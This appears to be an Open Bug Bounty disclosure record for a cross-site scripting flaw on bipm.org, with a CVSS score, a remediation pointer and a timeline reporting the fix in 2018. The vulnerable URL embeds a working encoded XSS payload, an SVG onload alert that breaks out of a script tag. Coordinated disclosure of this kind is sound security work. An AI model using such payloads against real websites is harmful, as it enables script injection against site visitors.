bipm.org XSS vulnerability

2016-05-22T03:34:00
ID OBB:155070
Type openbugbounty
Reporter et
Modified 2018-03-15T02:24:00

Description

Open Bug Bounty ID: OBB-155070

Description| Value
---|---
Affected Website:| bipm.org
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.bipm.org/exalead_kcdb/exa_kcdb.jsp?_z=1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E1/_z=2&_C=eJw9i9EKAiEQRed*Iphx1NHH2uilxz5AxIRdcF2rLfr8sqCXy!EeTiiQK4RnhdNw2Idda7leptcAYWnrtNQ70B*POd7S2I*YACGUuXP77hVSrnGGkGBL5Kx21qAlb9CLVdp1sSFDokUJKXZinVZW80!IkGb8OI!snGHuxTitx0cpoBDecBQrFA__&_p=AppC

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 May, 2016 03:34 GMT
Vulnerability Verified:| 22 May, 2016 03:36 GMT
Website Operator Notified:| 22 May, 2016 03:36 GMT
Vulnerability Published:| 22 May, 2016 03:36 GMT [without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:24 GMT
Public Disclosure:| 15 March, 2018 02:24 GMT